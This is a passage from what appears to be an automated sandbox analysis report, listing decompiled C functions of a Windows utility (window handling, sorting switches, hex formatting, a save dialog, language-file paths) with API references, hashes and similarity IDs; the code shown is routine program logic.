                                                                                                                                                0x0040b3a0
                                                                                                                                                0x0040b3b3
                                                                                                                                                0x0040b3b3
                                                                                                                                                0x0040b3bf
                                                                                                                                                0x0040b3c7
                                                                                                                                                0x0040b3c7
                                                                                                                                                0x0040b3d3
                                                                                                                                                0x0040b3d5
                                                                                                                                                0x0040b3d7
                                                                                                                                                0x0040b3d7
                                                                                                                                                0x0040b3e2
                                                                                                                                                0x0040b3ea
                                                                                                                                                0x0040b3ee
                                                                                                                                                0x0040b3f2
                                                                                                                                                0x0040b3f7
                                                                                                                                                0x0040b3f7
                                                                                                                                                0x0040b402
                                                                                                                                                0x0040b40b
                                                                                                                                                0x0040b40b
                                                                                                                                                0x0040b416
                                                                                                                                                0x0040b41c
                                                                                                                                                0x0040b42d
                                                                                                                                                0x0040b435
                                                                                                                                                0x0040b43a
                                                                                                                                                0x0040b446
                                                                                                                                                0x0040b44b
                                                                                                                                                0x0040b44f
                                                                                                                                                0x0040b459
                                                                                                                                                0x0040b45c
                                                                                                                                                0x0040b45d
                                                                                                                                                0x0040b468
                                                                                                                                                0x0040b471
                                                                                                                                                0x0040b476
                                                                                                                                                0x0040b476
                                                                                                                                                0x0040b478
                                                                                                                                                0x0040b47e
                                                                                                                                                0x0040b482
                                                                                                                                                0x0040b482
                                                                                                                                                0x0040b48d
                                                                                                                                                0x0040b4bf
                                                                                                                                                0x0040b4bf
                                                                                                                                                0x0040b4c5
                                                                                                                                                0x0040b4ed
                                                                                                                                                0x0040b4ed
                                                                                                                                                0x0040b4f3
                                                                                                                                                0x0040b4f7
                                                                                                                                                0x0040b4f7
                                                                                                                                                0x0040b4fc
                                                                                                                                                0x0040b502
                                                                                                                                                0x0040b50a
                                                                                                                                                0x0040b50e
                                                                                                                                                0x0040b512
                                                                                                                                                0x0040b517
                                                                                                                                                0x0040b517
                                                                                                                                                0x0040b51c
                                                                                                                                                0x0040b522
                                                                                                                                                0x0040b528
                                                                                                                                                0x0040b528
                                                                                                                                                0x0040b52d
                                                                                                                                                0x0040b533
                                                                                                                                                0x0040b539
                                                                                                                                                0x0040b539
                                                                                                                                                0x0040b53e
                                                                                                                                                0x0040b544
                                                                                                                                                0x0040b548
                                                                                                                                                0x0040b548
                                                                                                                                                0x0040b54d
                                                                                                                                                0x0040b553
                                                                                                                                                0x0040b559
                                                                                                                                                0x0040b564
                                                                                                                                                0x0040b56e
                                                                                                                                                0x0040b588
                                                                                                                                                0x0040b58d
                                                                                                                                                0x0040b591
                                                                                                                                                0x0040b597
                                                                                                                                                0x0040b59e
                                                                                                                                                0x0040b5a0
                                                                                                                                                0x0040b5a7
                                                                                                                                                0x0040b5a9
                                                                                                                                                0x0040b5a9
                                                                                                                                                0x0040b5a7
                                                                                                                                                0x0040b5b2
                                                                                                                                                0x0040b5b6
                                                                                                                                                0x0040b5bb
                                                                                                                                                0x0040b5bb
                                                                                                                                                0x0040b5bf
                                                                                                                                                0x0040b5c5
                                                                                                                                                0x0040b5cd
                                                                                                                                                0x0040b5cd
                                                                                                                                                0x0040b5d2
                                                                                                                                                0x0040b5d8
                                                                                                                                                0x0040b5e0
                                                                                                                                                0x0040b5e0
                                                                                                                                                0x0040b5e5
                                                                                                                                                0x0040b5eb
                                                                                                                                                0x0040b5f9
                                                                                                                                                0x0040b5f9
                                                                                                                                                0x00000000
                                                                                                                                                0x0040b5eb
                                                                                                                                                0x0040b4c7
                                                                                                                                                0x0040b4cd
                                                                                                                                                0x0040b4d4
                                                                                                                                                0x0040b4e8
                                                                                                                                                0x00000000
                                                                                                                                                0x0040b4e8
                                                                                                                                                0x0040b4d6
                                                                                                                                                0x0040b4db
                                                                                                                                                0x00000000
                                                                                                                                                0x0040b48f
                                                                                                                                                0x0040b48f
                                                                                                                                                0x0040b49c
                                                                                                                                                0x0040b4ba
                                                                                                                                                0x00000000
                                                                                                                                                0x0040b4ba
                                                                                                                                                0x0040b49e
                                                                                                                                                0x0040b4a3
                                                                                                                                                0x0040b4a8
                                                                                                                                                0x0040b4a8
                                                                                                                                                0x0040b4aa
                                                                                                                                                0x00000000
                                                                                                                                                0x0040b4aa
                                                                                                                                                0x0040b5fe
                                                                                                                                                0x0040b5fe
                                                                                                                                                0x0040b604
                                                                                                                                                0x0040b604

                                                                                                                                                APIs
                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000000), ref: 0040B3B3
                                                                                                                                                • DestroyWindow.USER32(?), ref: 0040B3C7
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DestroyInvalidateRectWindow
                                                                                                                                                • String ID: 33@
                                                                                                                                                • API String ID: 724544332-1541121659
                                                                                                                                                • Opcode ID: 7ad5f6ad311df91c89693e5a2d2bb114cf057b36f9e353a504ef30fe770d82e2
                                                                                                                                                • Instruction ID: f9cdce4f37102d27210f5083c80b5f01578b93f7cfdd6efd8ac2da961f31085b
                                                                                                                                                • Opcode Fuzzy Hash: 7ad5f6ad311df91c89693e5a2d2bb114cf057b36f9e353a504ef30fe770d82e2
                                                                                                                                                • Instruction Fuzzy Hash: 35714630600205AACB24BF16C845A5DB3A5EB40338F14C57AF4686B6E1D77D9D958BCE
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0040A4C2, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 78%
                                                                                                                                                			E0040A4C2(void* __eax) {
				void* __ebx;
				void* __edi;
				short* __esi;
				void* _t24;
				int _t27;
				void* _t36;
				intOrPtr* _t43;

				_t36 = __eax;
				if( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x6c0)) + 0x30)) <= 0) {
					L11:
					E0040528C();
					 *((intOrPtr*)( *((intOrPtr*)(_t36 + 0x69c)) + 0x3c)) = 0;
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t36 + 0x69c)))) + 0x68))();
					_t24 = E004065C4( *((intOrPtr*)(_t36 + 0x6c0)), L"/nosort");
					__eflags = _t24 - 0xffffffff;
					if(_t24 != 0xffffffff) {
						L15:
						goto L1;
					}
					__eflags =  *0x4131d4; // 0x1
					_t43 =  *((intOrPtr*)(_t36 + 0x69c));
					if(__eflags == 0) {
						 *0x4131d8 =  *((intOrPtr*)(_t43 + 0x2d8));
						 *0x4131d4 = 1;
					}
					_t27 =  *((intOrPtr*)( *_t43 + 0x6c))();
					qsort(E00407588(_t43, 0),  *(_t43 + 0x3c), _t27, E00409EA2);
					goto L15;
				} else {
					do {
						__ecx = __esi;
						__eax = E004065EE(__eax, __esi, L"/sort");
						__eflags = __eax;
						if(__eax != 0) {
							__eax =  *((intOrPtr*)(__edi + 0x6c0));
							_t4 = __esi + 1; // 0x1
							__ecx = _t4;
							__eflags = __ecx -  *((intOrPtr*)(__eax + 0x30));
							if(__ecx >=  *((intOrPtr*)(__eax + 0x30))) {
								__ecx = 0x40f454;
							} else {
								__ecx = __eax;
							}
							__eflags =  *__ecx - 0x7e;
							__eax =  *((intOrPtr*)(__edi + 0x69c));
							if(__eflags != 0) {
							} else {
								_push(1);
								__ecx = __ecx + 2;
							}
							_push(__ecx);
							__eax = E0040A084(__eax, __eflags);
						}
						__eax =  *((intOrPtr*)(__edi + 0x6c0));
						__esi = __esi + 1;
						__eflags = __esi -  *((intOrPtr*)(__eax + 0x30));
					} while (__esi <  *((intOrPtr*)(__eax + 0x30)));
					goto L11;
				}
				L1:
				return SetCursor( *0x412390);
			}










                                                                                                                                                0x0040a4c5
                                                                                                                                                0x0040a4d4
                                                                                                                                                0x0040a528
                                                                                                                                                0x0040a528
                                                                                                                                                0x0040a533
                                                                                                                                                0x0040a53e
                                                                                                                                                0x0040a54c
                                                                                                                                                0x0040a551
                                                                                                                                                0x0040a554
                                                                                                                                                0x0040a599
                                                                                                                                                0x00000000
                                                                                                                                                0x0040a59b
                                                                                                                                                0x0040a556
                                                                                                                                                0x0040a55c
                                                                                                                                                0x0040a562
                                                                                                                                                0x0040a56a
                                                                                                                                                0x0040a56f
                                                                                                                                                0x0040a56f
                                                                                                                                                0x0040a585
                                                                                                                                                0x0040a591
                                                                                                                                                0x00000000
                                                                                                                                                0x0040a4d6
                                                                                                                                                0x0040a4d6
                                                                                                                                                0x0040a4db
                                                                                                                                                0x0040a4dd
                                                                                                                                                0x0040a4e2
                                                                                                                                                0x0040a4e4
                                                                                                                                                0x0040a4e6
                                                                                                                                                0x0040a4ec
                                                                                                                                                0x0040a4ec
                                                                                                                                                0x0040a4ef
                                                                                                                                                0x0040a4f2
                                                                                                                                                0x0040a4fd
                                                                                                                                                0x0040a4f4
                                                                                                                                                0x0040a4f9
                                                                                                                                                0x0040a4f9
                                                                                                                                                0x0040a502
                                                                                                                                                0x0040a506
                                                                                                                                                0x0040a50c
                                                                                                                                                0x0040a50e
                                                                                                                                                0x0040a50e
                                                                                                                                                0x0040a510
                                                                                                                                                0x0040a510
                                                                                                                                                0x0040a516
                                                                                                                                                0x0040a517
                                                                                                                                                0x0040a517
                                                                                                                                                0x0040a51c
                                                                                                                                                0x0040a522
                                                                                                                                                0x0040a523
                                                                                                                                                0x0040a523
                                                                                                                                                0x00000000
                                                                                                                                                0x0040a4d6
                                                                                                                                                0x004052a6
                                                                                                                                                0x004052b2

                                                                                                                                                APIs
                                                                                                                                                • qsort.MSVCRT ref: 0040A591
                                                                                                                                                  • Part of subcall function 004065EE: _wcsicmp.MSVCRT ref: 00406604
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _wcsicmpqsort
                                                                                                                                                • String ID: /nosort$/sort
                                                                                                                                                • API String ID: 1579243037-1578091866
                                                                                                                                                • Opcode ID: 124884d5dc6559089fffaca0d7121966e37f59272275963d4074e0ad8fb9bc0b
                                                                                                                                                • Instruction ID: 6b5ec6eb7515bc088160010cb6f8a328b32efe940b1a3fb6a30810c5b3da645c
                                                                                                                                                • Opcode Fuzzy Hash: 124884d5dc6559089fffaca0d7121966e37f59272275963d4074e0ad8fb9bc0b
                                                                                                                                                • Instruction Fuzzy Hash: 8821D370600600FFC714EF26C885DA6B3A5FB44328B01017EE915BB6E1C779BC608B9A
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00405E81, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 70%
                                                                                                                                                			E00405E81(intOrPtr _a4, intOrPtr _a8, void* _a12) {
				void* _v8;
				void* _v26;
				void _v28;
				void* _t24;
				void* _t25;
				void* _t35;
				signed int _t38;
				signed int _t42;
				void* _t44;
				void* _t45;

				_t24 = _a12;
				_t45 = _t44 - 0x18;
				_t42 = 0;
				 *_t24 = 0;
				if(_a8 <= 0) {
					_t25 = 0;
				} else {
					_t38 = 0;
					_t35 = 0;
					if(_a8 > 0) {
						_v8 = _t24;
						while(1) {
							_v28 = _v28 & 0x00000000;
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosw");
							_push( *(_t35 + _a4) & 0x000000ff);
							_push(L"%2.2X ");
							_push(0xa);
							_push( &_v28);
							L0040DFD6();
							_t38 = _t42;
							memcpy(_v8,  &_v28, 6);
							_t13 = _t42 + 3; // 0x3
							_t45 = _t45 + 0x1c;
							if(_t13 >= 0x2000) {
								break;
							}
							_v8 = _v8 + 6;
							_t35 = _t35 + 1;
							_t42 = _t42 + 3;
							if(_t35 < _a8) {
								continue;
							}
							break;
						}
						_t24 = _a12;
					}
					 *(_t24 + 4 + _t38 * 2) =  *(_t24 + 4 + _t38 * 2) & 0x00000000;
					_t25 = 1;
				}
				return _t25;
			}













                                                                                                                                                0x00405e84
                                                                                                                                                0x00405e87
                                                                                                                                                0x00405e8b
                                                                                                                                                0x00405e90
                                                                                                                                                0x00405e93
                                                                                                                                                0x00405f05
                                                                                                                                                0x00405e95
                                                                                                                                                0x00405e97
                                                                                                                                                0x00405e99
                                                                                                                                                0x00405e9e
                                                                                                                                                0x00405ea0
                                                                                                                                                0x00405ea3
                                                                                                                                                0x00405ea3
                                                                                                                                                0x00405ead
                                                                                                                                                0x00405eae
                                                                                                                                                0x00405eaf
                                                                                                                                                0x00405eb0
                                                                                                                                                0x00405eb1
                                                                                                                                                0x00405eba
                                                                                                                                                0x00405ebb
                                                                                                                                                0x00405ec3
                                                                                                                                                0x00405ec5
                                                                                                                                                0x00405ec6
                                                                                                                                                0x00405ed4
                                                                                                                                                0x00405ed6
                                                                                                                                                0x00405edb
                                                                                                                                                0x00405ede
                                                                                                                                                0x00405ee6
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00405ee8
                                                                                                                                                0x00405eec
                                                                                                                                                0x00405eed
                                                                                                                                                0x00405ef3
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00405ef3
                                                                                                                                                0x00405ef5
                                                                                                                                                0x00405ef5
                                                                                                                                                0x00405ef8
                                                                                                                                                0x00405f01
                                                                                                                                                0x00405f02
                                                                                                                                                0x00405f09

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _snwprintfmemcpy
                                                                                                                                                • String ID: %2.2X
                                                                                                                                                • API String ID: 2789212964-323797159
                                                                                                                                                • Opcode ID: 5646eba8dd4affce10f05f382f775d9093a619cdef628270f3a0be2943da427e
                                                                                                                                                • Instruction ID: 09870db8f10325833ee0949f0b54b8ee796ec7cfb255f8a941d73aa4e244bb5d
                                                                                                                                                • Opcode Fuzzy Hash: 5646eba8dd4affce10f05f382f775d9093a619cdef628270f3a0be2943da427e
                                                                                                                                                • Instruction Fuzzy Hash: 33118232904609BFDB10DFE8C8869AF73B9FB44314F108477ED11E7181E6789A158BD5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00405DCD, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E00405DCD(intOrPtr* __ebx, intOrPtr __ecx, wchar_t* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				signed int _v52;
				signed int _v60;
				intOrPtr _v64;
				wchar_t* _v68;
				intOrPtr _v72;
				signed int _v80;
				intOrPtr _v84;
				intOrPtr _v92;
				struct tagOFNA _v96;
				intOrPtr _t23;
				intOrPtr* _t33;
				intOrPtr _t34;
				wchar_t* _t38;

				_t38 = __edi;
				_t34 = __ecx;
				_t33 = __ebx;
				_t23 = 1;
				if(__ebx != 0) {
					_t23 =  *__ebx;
				}
				_v80 = _v80 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v52 = _v52 & 0x00000000;
				_v72 = _t23;
				_v48 = _a8;
				_v36 = _a12;
				_v92 = _t34;
				_v96 = 0x58;
				_v84 = _a4;
				_v68 = _t38;
				_v64 = 0x104;
				_v44 = 0x80806;
				if(GetSaveFileNameW( &_v96) == 0) {
					return 0;
				} else {
					if(_t33 != 0) {
						 *_t33 = _v72;
					}
					wcscpy(_t38, _v68);
					return 1;
				}
			}



















                                                                                                                                                0x00405dcd
                                                                                                                                                0x00405dcd
                                                                                                                                                0x00405dcd
                                                                                                                                                0x00405dd5
                                                                                                                                                0x00405dd8
                                                                                                                                                0x00405dda
                                                                                                                                                0x00405dda
                                                                                                                                                0x00405ddc
                                                                                                                                                0x00405de0
                                                                                                                                                0x00405de4
                                                                                                                                                0x00405de8
                                                                                                                                                0x00405dee
                                                                                                                                                0x00405df4
                                                                                                                                                0x00405df7
                                                                                                                                                0x00405e01
                                                                                                                                                0x00405e08
                                                                                                                                                0x00405e0b
                                                                                                                                                0x00405e0e
                                                                                                                                                0x00405e15
                                                                                                                                                0x00405e24
                                                                                                                                                0x00405e42
                                                                                                                                                0x00405e26
                                                                                                                                                0x00405e28
                                                                                                                                                0x00405e2d
                                                                                                                                                0x00405e2d
                                                                                                                                                0x00405e33
                                                                                                                                                0x00405e3e
                                                                                                                                                0x00405e3e

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FileNameSavewcscpy
                                                                                                                                                • String ID: X
                                                                                                                                                • API String ID: 3080202770-3081909835
                                                                                                                                                • Opcode ID: a0857a089f4deec4c1b474bd9ffc3361d4690667bb8dbb74d33b67a2b866139b
                                                                                                                                                • Instruction ID: 35274199d236effe9a648b535348c56afb13a0cf633c63e6ee0ccd6430c010a7
                                                                                                                                                • Opcode Fuzzy Hash: a0857a089f4deec4c1b474bd9ffc3361d4690667bb8dbb74d33b67a2b866139b
                                                                                                                                                • Instruction Fuzzy Hash: D80192B1D106599FDF10DFE9D88479EBBF4FB08319F10842AE815EA284DBB499098F54
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0040196B, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E0040196B(void* __eax, void* __ecx, intOrPtr* __esi) {
				intOrPtr _v8;
				void* __ebx;
				intOrPtr _t10;
				void* _t14;
				WINDOWPLACEMENT* _t15;
				void* _t18;
				struct HWND__* _t23;
				intOrPtr* _t24;

				_t24 = __esi;
				_t18 = __eax;
				_t1 = _t24 + 4; // 0x40d794
				_t10 =  *_t1;
				_v8 = _t10;
				if(_t10 == 0) {
					memset(__eax + 0x248, 0, 0x2c);
				} else {
					_t23 =  *(__eax + 0x208);
					if(_t23 != 0) {
						_t15 = __eax + 0x248;
						_t15->length = 0x2c;
						GetWindowPlacement(_t23, _t15);
					}
				}
				_t14 =  *((intOrPtr*)( *_t24 + 0xc))(L"WinPos", _t18 + 0x248, 0x2c);
				if(_v8 == 0) {
					_t14 = E004019D2(_t18);
				}
				return _t14;
			}











                                                                                                                                                0x0040196b
                                                                                                                                                0x00401970
                                                                                                                                                0x00401972
                                                                                                                                                0x00401972
                                                                                                                                                0x00401977
                                                                                                                                                0x0040197a
                                                                                                                                                0x004019a7
                                                                                                                                                0x0040197c
                                                                                                                                                0x0040197c
                                                                                                                                                0x00401984
                                                                                                                                                0x00401986
                                                                                                                                                0x0040198e
                                                                                                                                                0x00401994
                                                                                                                                                0x00401994
                                                                                                                                                0x00401984
                                                                                                                                                0x004019c1
                                                                                                                                                0x004019c8
                                                                                                                                                0x004019ca
                                                                                                                                                0x004019ca
                                                                                                                                                0x004019d1

                                                                                                                                                APIs
                                                                                                                                                • GetWindowPlacement.USER32(?,?,00000002,?,?,0040B20B,?,?,?,00000002,?,?,?,?,?,00000000), ref: 00401994
                                                                                                                                                • memset.MSVCRT ref: 004019A7
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: PlacementWindowmemset
                                                                                                                                                • String ID: WinPos
                                                                                                                                                • API String ID: 4036792311-2823255486
                                                                                                                                                • Opcode ID: 81be9ea41e6d398efb68a6c6dc4070ed39b463af53e59a3c9cc3062c0f115d68
                                                                                                                                                • Instruction ID: 309fedf9ece379f47234066dfb297f1f11f9bdd101b0f57d7b7a510f29a8e9ac
                                                                                                                                                • Opcode Fuzzy Hash: 81be9ea41e6d398efb68a6c6dc4070ed39b463af53e59a3c9cc3062c0f115d68
                                                                                                                                                • Instruction Fuzzy Hash: 3CF062B0610204EFEB54DF55C899FAE33E99F04700F54017AE9099F1D1EBB89D44C769
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00407170, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 89%
                                                                                                                                                			E00407170(void* __ecx, void* __eflags, struct HINSTANCE__* _a4) {
				void _v8198;
				short _v8200;
				int _t11;
				int _t16;

				E0040E340(0x2004, __ecx);
				_t16 = 0;
				_v8200 = 0;
				memset( &_v8198, 0, 0x2000);
				do {
					_t11 = LoadStringW(_a4, _t16,  &_v8200, 0x1000);
					if(_t11 > 0) {
						_t11 = E00406E5E(_t16,  &_v8200);
					}
					_t16 = _t16 + 1;
				} while (_t16 <= 0xffff);
				return _t11;
			}







                                                                                                                                                0x00407178
                                                                                                                                                0x0040717e
                                                                                                                                                0x0040718d
                                                                                                                                                0x00407194
                                                                                                                                                0x0040719c
                                                                                                                                                0x004071ac
                                                                                                                                                0x004071b4
                                                                                                                                                0x004071be
                                                                                                                                                0x004071c4
                                                                                                                                                0x004071c5
                                                                                                                                                0x004071c6
                                                                                                                                                0x004071d0

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 00407194
                                                                                                                                                • LoadStringW.USER32(00412E48,00000000,?,00001000), ref: 004071AC
                                                                                                                                                  • Part of subcall function 00406E5E: memset.MSVCRT ref: 00406E71
                                                                                                                                                  • Part of subcall function 00406E5E: _itow.MSVCRT ref: 00406E7F
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$LoadString_itow
                                                                                                                                                • String ID: ;t@
                                                                                                                                                • API String ID: 2363904170-3941608961
                                                                                                                                                • Opcode ID: abd66195640579f6e500643e127a0019a6d222aabc7e30448b3f27de400d40d8
                                                                                                                                                • Instruction ID: 51c9355171e471fb499396a2aa2e6012e16bb247b54c8a94724daa36fdc5b9b4
                                                                                                                                                • Opcode Fuzzy Hash: abd66195640579f6e500643e127a0019a6d222aabc7e30448b3f27de400d40d8
                                                                                                                                                • Instruction Fuzzy Hash: 5BF0A73290032829F724AA56DD4ABDB7B6CDF05754F0000B6BB0CF61D2D634AA50CBEE
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 004073D0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E004073D0(wchar_t* __esi) {
				wchar_t* _t2;
				wchar_t* _t6;

				_t6 = __esi;
				E00405800(__esi);
				_t2 = wcsrchr(__esi, 0x2e);
				if(_t2 != 0) {
					 *_t2 =  *_t2 & 0x00000000;
				}
				return wcscat(_t6, L"_lng.ini");
			}





                                                                                                                                                0x004073d0
                                                                                                                                                0x004073d1
                                                                                                                                                0x004073d9
                                                                                                                                                0x004073e3
                                                                                                                                                0x004073e5
                                                                                                                                                0x004073e5
                                                                                                                                                0x004073f6

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00405800: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,004073D6,00000000,00407289,?,00000000,00000208,?), ref: 0040580B
                                                                                                                                                • wcsrchr.MSVCRT ref: 004073D9
                                                                                                                                                • wcscat.MSVCRT ref: 004073EF
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FileModuleNamewcscatwcsrchr
                                                                                                                                                • String ID: _lng.ini
                                                                                                                                                • API String ID: 383090722-1948609170
                                                                                                                                                • Opcode ID: ac25628e4bbd1f7f59230636c7e582e2e1885c094a405939c83156bbf3aedd80
                                                                                                                                                • Instruction ID: d66fa5373373d5564c67ff94d3685b1a514421eeb891155236f9d41770c1593b
                                                                                                                                                • Opcode Fuzzy Hash: ac25628e4bbd1f7f59230636c7e582e2e1885c094a405939c83156bbf3aedd80
                                                                                                                                                • Instruction Fuzzy Hash: AEC0125394561154E12132125C03B4F21448F06314F70003BFC06744C2ABFD6115C06F
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 004075A6, Relevance: 5.1, APIs: 4, Instructions: 76COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 90%
                                                                                                                                                			E004075A6(intOrPtr* __esi, void* __eflags) {
				intOrPtr* _t33;
				intOrPtr* _t42;

				_t42 = __esi;
				 *__esi = 0x410168;
				 *((intOrPtr*)(__esi + 0x2f0)) = 0;
				_t33 = E00405CF8(0x34c, __esi);
				_push(0x14);
				 *((intOrPtr*)(__esi + 0x33c)) = 0;
				 *((intOrPtr*)(__esi + 0x348)) = 0;
				 *((intOrPtr*)(__esi + 0x2dc)) = 0;
				 *((intOrPtr*)(__esi + 0x2a0)) = 0;
				 *((intOrPtr*)(__esi + 0x2f4)) = 0;
				 *((intOrPtr*)(__esi + 0x2f8)) = 0xfff;
				 *((intOrPtr*)(__esi + 0x20)) = 0;
				 *((intOrPtr*)(__esi + 4)) = 0;
				 *((intOrPtr*)(__esi + 0x2a8)) = 0;
				 *((intOrPtr*)(__esi + 0x2ec)) = 1;
				L0040E038();
				if(_t33 == 0) {
					_t33 = 0;
				} else {
					 *((intOrPtr*)(_t33 + 0xc)) = 0;
					 *_t33 = 0;
					 *((intOrPtr*)(_t33 + 4)) = 0;
					 *((intOrPtr*)(_t33 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t33 + 8)) = 0;
				}
				_push(0x14);
				 *((intOrPtr*)(_t42 + 8)) = _t33;
				L0040E038();
				if(_t33 == 0) {
					_t33 = 0;
				} else {
					 *((intOrPtr*)(_t33 + 0xc)) = 0;
					 *_t33 = 0;
					 *((intOrPtr*)(_t33 + 4)) = 0;
					 *((intOrPtr*)(_t33 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t33 + 8)) = 0;
				}
				_push(0x14);
				 *((intOrPtr*)(_t42 + 0xc)) = _t33;
				L0040E038();
				if(_t33 == 0) {
					_t33 = 0;
				} else {
					 *((intOrPtr*)(_t33 + 0xc)) = 0;
					 *_t33 = 0;
